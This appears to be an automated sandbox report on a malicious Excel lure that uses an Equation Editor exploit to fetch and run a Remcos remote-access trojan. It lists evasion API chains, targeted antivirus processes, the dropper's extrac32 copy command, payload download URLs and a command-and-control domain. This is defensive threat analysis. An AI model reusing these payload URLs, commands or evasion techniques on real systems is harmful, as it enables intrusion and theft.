Source: C:\Users\user\AppData\Roaming\csrss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Source: Home Purchase Contract and Property Details.xls	Stream path 'MBD00099100/Package' entropy: 7.95104444318 (max. 8.0)
Source: Home Purchase Contract and Property Details.xls	Stream path 'Workbook' entropy: 7.99059170433 (max. 8.0)
Source: ~DF78F515A159E2AA69.TMP.0.dr	Stream path 'Package' entropy: 7.94211196967 (max. 8.0)
Source: 0B430000.0.dr	Stream path 'MBD00099100/Package' entropy: 7.94211196967 (max. 8.0)
Source: 0B430000.0.dr	Stream path 'Workbook' entropy: 7.99751644532 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C8CC94

11_2_02C8CC94

Delayed program exit found

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4F7A7 Sleep,ExitProcess,

8_2_33D4F7A7

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_11-53504

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

8_2_33D5A748

Source: C:\Users\user\AppData\Roaming\csrss.exe	Window / User API: threadDelayed 422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Window / User API: threadDelayed 9260	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Window / User API: foregroundWindowGot 1733	Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_8-33833

Source: C:\Users\user\AppData\Roaming\csrss.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_8-33857

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

API coverage: 10.0 %

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C8CC94

11_2_02C8CC94

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3720	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3928	Thread sleep time: -64000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3932	Thread sleep time: -1266000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3956	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe TID: 3932	Thread sleep time: -27780000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D8E879 FindFirstFileExA,	8_2_33D8E879
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_33D4C34D
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_33D4BB30
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D59AF5 FindFirstFileW,	8_2_33D59AF5
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_33D5C291
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4880C FindFirstFileW,FindNextFileW,FindClose,	8_2_33D4880C
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4783C FindFirstFileW,FindNextFileW,	8_2_33D4783C
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D49665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_33D49665
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_33D4BD37
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C758B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	11_2_02C758B4

Source: C:\Users\user\AppData\Roaming\csrss.exe	API call chain: ExitProcess graph end node			graph_8-34198
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	API call chain: ExitProcess graph end node			graph_11-53502

Source: C:\Users\user\AppData\Roaming\csrss.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Process queried: DebugFlags	Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_33D7BB22

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D54D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

8_2_33D54D86

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D832B5 mov eax, dword ptr fs:[00000030h]	8_2_33D832B5
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D2632B5 mov eax, dword ptr fs:[00000030h]	11_2_2D2632B5
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02CB73AD mov eax, dword ptr fs:[00000030h]	11_2_02CB73AD

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D52077 GetProcessHeap,HeapFree,

8_2_33D52077

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D74B47 SetUnhandledExceptionFilter,	8_2_33D74B47
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_33D7BB22
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_33D749F9
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D749F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_33D749F8
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_33D74FDC
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D254FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_2D254FDC
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D25BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_2D25BB22

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D59627 mouse_event,

8_2_33D59627

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF			Jump to behavior

Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Managery] [Compatibility Mode] - Microsoft Word
Source: csrss.exe, 00000008.00000002.1015314585.0000000052030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLD\ini3dU
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: logs.dat.8.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D74C52 cpuid

8_2_33D74C52

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetLocaleInfoW,	8_2_33D92313
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetLocaleInfoW,	8_2_33D888ED
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: EnumSystemLocalesW,	8_2_33D92036
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: EnumSystemLocalesW,	8_2_33D91F9B
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: EnumSystemLocalesW,	8_2_33D91F50
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_33D92610
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetLocaleInfoW,	8_2_33D92543
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_33D91CD8
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: EnumSystemLocalesW,	8_2_33D88404
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_33D9243C
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: GetLocaleInfoA,	8_2_33D4F8D1
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	11_2_02C8D754
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	11_2_02C75A78
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	11_2_02C8D754
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: GetLocaleInfoA,	11_2_02C7A788
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: GetLocaleInfoA,	11_2_02C7A73C
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	11_2_02C944DE
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	11_2_02C75B84

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D88957 GetSystemTimeAsFileTime,

8_2_33D88957

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5B60D GetComputerNameExW,GetUserNameW,

8_2_33D5B60D

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D89365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_33D89365

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C7B704 GetVersionExA,

11_2_02C7B704

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\notes\logs.dat, type: DROPPED

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Roaming\csrss.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLD	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLD	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-9VASLD	Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\notes\logs.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	12 Native API	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	211 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Valid Accounts	11 Access Token Manipulation	21 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	2 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	1 Windows Service	1 Install Root Certificate	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	12 Process Injection	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	21 Masquerading	Cached Domain Credentials	36 System Information Discovery	VNC	GUI Input Capture	223 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Query Registry	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	25 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	2 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Access Token Manipulation	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	Command Obfuscation	GUI Input Capture	1 Remote System Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Home Purchase Contract and Property Details.xls	11%	ReversingLabs	Document-Excel.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe	21%	ReversingLabs
C:\Users\user\AppData\Roaming\csrss.exe	21%	ReversingLabs
C:\Users\Public\Libraries\Efftwcmk.PIF	21%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://www.day.com/dam/1.0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://www.pmail.com	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0C	0%	URL Reputation	safe
https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_	0%	Avira URL Cloud	safe
http://94.156.67.72/4020/csrss.exej	0%	Avira URL Cloud	safe
http://qr-in.com/NAvSGzZ	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpt	0%	Avira URL Cloud	safe
https://live.com/	0%	Avira URL Cloud	safe
https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo	0%	Avira URL Cloud	safe
https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMc	0%	Avira URL Cloud	safe
wwsaer.duckdns.org	0%	Avira URL Cloud	safe
http://94.156.67.72/4020/csrss.exejjC:	0%	Avira URL Cloud	safe
http://94.156.67.72/4020/csrss.exe	0%	Avira URL Cloud	safe
http://qr-in.com/	0%	Avira URL Cloud	safe
https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=	0%	Avira URL Cloud	safe
http://qr-in.com/NAvSGzZyX	0%	Avira URL Cloud	safe
https://onedrive.live.com/downlo	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
qr-in.com	188.114.96.3	true	true	unknown
dual-spov-0006.spov-msedge.net	13.107.137.11	true	false	unknown
geoplugin.net	178.237.33.50	true	false	unknown
wwsaer.duckdns.org	91.92.251.26	true	true	unknown
dual-spov-0006.spov-dc-msedge.net	150.171.41.11	true	false	unknown
onedrive.live.com	unknown	unknown	true	unknown
f3rtrw.bl.files.1drv.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wwsaer.duckdns.org	true	Avira URL Cloud: safe	unknown
http://qr-in.com/NAvSGzZ	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
http://94.156.67.72/4020/csrss.exe	true	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://94.156.67.72/4020/csrss.exejjC:	EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://94.156.67.72/4020/csrss.exej	EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
